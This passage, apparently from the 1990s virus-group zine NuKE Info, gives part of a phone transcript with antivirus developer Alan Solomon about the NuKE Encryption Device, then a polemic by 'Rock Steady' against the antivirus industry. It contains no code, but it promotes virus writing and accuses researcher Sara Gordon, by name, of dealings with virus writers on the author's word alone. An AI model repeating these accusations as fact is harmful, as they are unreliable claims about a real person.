SO> I can understand why your pissed off. But Joe, what's your development in
this? Why you part of the phone call?
RS> Why not?
SO> There's no reason why not.
AR> I'll tell you why, cuz I asked him, as I'm putting an article in NuKE Info
six. It basically explains my side, on how everything transpires.
SO> Did Nowhere Man really write the NuKE Encryption Device, by himself!
RS> Yes he did, why?
SO> Well because I saw it.
RS> Well that was just a Beta Release v.90.
SO> No, I've seen the final!
RS> uh? What version do you have?
SO> oh sorry, we're not suppose to?
RS> version .90.
SO> No its version 1.00
RS> That does not exist!
SO> I've got a thing that calls itself the N.E.D. v1.00, it mind be of course.
RS> I'll tell you right now, it version .90
SO> Is there some bytes I can read out to help to identify it?
RS> Not really, because version 1.00 changed dramatically.
<anyhow after a bit of blahing, this so called NED v1.00 is really v.90 that
was renamed and inserted into a new virus, generating from europe.>
In most part this was the main concern of the conversation, we wanted to bring
out. Surely, this is only 1/5 of the total conference, as a matter of fact this
was the first hour of the conference, and by tone of voice, it was fairly
hostile. But, we are not one to racially judge a person because of his ethnic
surroundings, or occupation in life, so it would only be fair to say that Alan
Soloman was fairly a reasonable man to talk to.
Interesting enough Alan did remove his safeguard, so who said Soloman's package
was unbeatable? The rest of the conversation, did focus on ideas, ideologies,
morals and some of the unexpected problems due to this structured AntiVirus
bludgeon.
Problems you say? Who would have expected such a problem? The community
responsible to `Clean-Up' the virus problem has done a good job in that, but
who would have expected them to leave behind a muddy trail of destruction where
they go? It all begins with the first Anti-Virus package, determined to detect
and wipe-out any known virus out there. Note the word `KNOWN'. So basically,
you would have to collect, if you may say so, and perhaps have people collecting
for you, viruses so that you may add them to your Anti-Virus package to gain the
cutting edge over your competitors. Now then, the remaining successful virus
packages have somewhat localized, in a geographic state. McAfee Scan has
dominated North America, Vet7 has dominated the Australia and Asian region. You
can conclude that Frisk has gained a fair amount of support in Europe, as well
as Solomans package.
Now then, this is only because of geographic location. If someone in California
notices a new virus, the first person he'll call and give this virus to is,
naturally, McAfee. The same goes for Soloman and people crying in England (UK).
Now, to gain that cutting edge, wouldn't you need all of those viruses across
the world, so you may even begin to gain world-wide market share support?
Naturally, so what do you do? You can form alliances with other Anti-Virus
programmers, but that isn't enough, and perhaps unfair! Unfair is a sense, that
an alliance with Soloman and McAfee would be to Soloman's advantage, surely
McAfee covers a wider population and receives new viruses at a must faster pace
compared to the England counter part. So we're stuck between a rock and a hard
place, again.
Hey, <light bulb blazing above yeah!>, why not form an association with
members pertaining to all these continents, and bring upon our collection
together to form an Even Bigger collection? Sure! Great idea! Lets call it
NCSA! Yeah! Then another newfy pops up and screams, CARO! Yeah, another group.
But what happens now? To our amazement, we have gentlemen, roaming the under-
ground technodrome, mission: collect new viruses. Having no statute they will
resort to anything in order to gain new viruses. Somehow, our "hero's" that
claim to save us from the virus problem, are low-down, bottom of the food chain
infantile, resorting to unmoral methods to gain viruses. huh? Explain?
humm, I will use myself as an easy example. I, Rock Steady, along with Pure
Energy manage a bulletin board known as Cybernetic Violence. The main head
quarters of NuKE, we're looked upon as `evil-doers', misdirected youths, bullies
that now know how to type, scum, satan's helpers <my personal favourite> I
believe you get the picture? And yes, it isn't a pretty one for sure, you may
call this harassment, as a matter of fact it _is_ harassment. Now then, where
can you get the latest virus put out by the intellectual challenged mind?
Of course, the mischievous virus groups. Oh no, this guy won't give me virus
access unless I show him I'm `deserving' of it. Okay I got it, let me upload
you my whole NCSA, virus collection...
Get the picture? Yes, we all heard it before, I'm a deranged lair. The Anti-
Virus community is _not_ maniacal to associate themselves with us. We all
heard of Sara Gordon screaming out, `I never called an underground exchange
board', she will never admit it. Nevertheless Sara Gordan holds the phone
number of Cybernetic Violence, Black Axes, The Hell Pit, etc, etc. Sara doesn't
associate herself with low-lives like ourselves, as she explains. Nevertheless,
she has CLAIMED to have called up The Hell Pit BBS, and uploaded 3 fake viruses
and exclaims how easy it was to obtain virus access there. Now there's a
contradiction. Now who are you going to believe? Rock Steady, with a record for
hacking, and suspected of other cyber-crimes, or Sara Gordan with not even a
bug-stain on her record? Wait, let me tell you some more. Sara Gordan is not
totally `white', since Sara doesn't associate herself with `us', I guess the
conversation we had concerning her wanting to invite a person called `Nowhere
Man' to dinner was a figment of my imagination. Also, the crap she said to me,
about getting her in contact with virus writers in Australia, was a figment
of my vivid imagination. Come on Sara, I heard it and you said it. Of course,
this is simply my word against yours. Son of a gun Sara, didn't you hear all
them `clicking' noises during our conversation? There was someone else on the
line Sara! Someone, that kept on receiving calls, and therefore he/she had to
switch and answer the call, via MaBells `Calling Waiting' service.
See I guess this isn't after all, just a figment of my imagination. Since I
conference the call, my phone bill supports the fact that TWO calls were made
at the same time from my number! One was to the alledged person in the
background while the other was yours! (Sara)
Oh yes, I'm a bored teenager derange liar wanting to bust balls. Frankly, no one
admitted in NuKE is a teenager. Frankly I'm currently in a respectable banking
position, nevertheless I still am pursuing my Masters in Mathematics, and may
this even lead to a Ph.D., of course by then I'm expected to sprout out of my
satanic puberty stage and into adulthood. Even though I'm way passed the legal
adult age, may you still say its a hormone thing. Frankly, when just is not done
and lies are tossed over to the public, discrediting our history, with your
influence of power. <Yes, corruption of power> Until that day of just, until
that day of truth comes out, then that will be the day you will get rid of me.
You see this isn't about me, this is about the you. <The AntiVirus community>
This isn't something you `mature out of', when do you mature out of injustice?
In what point of life is injustice okay?
The Virus problem has been solved, now what about the Anti-Virus Problem?
Rock Steady
NuKE: The Anti-Anti-Virus Group!
================================================================================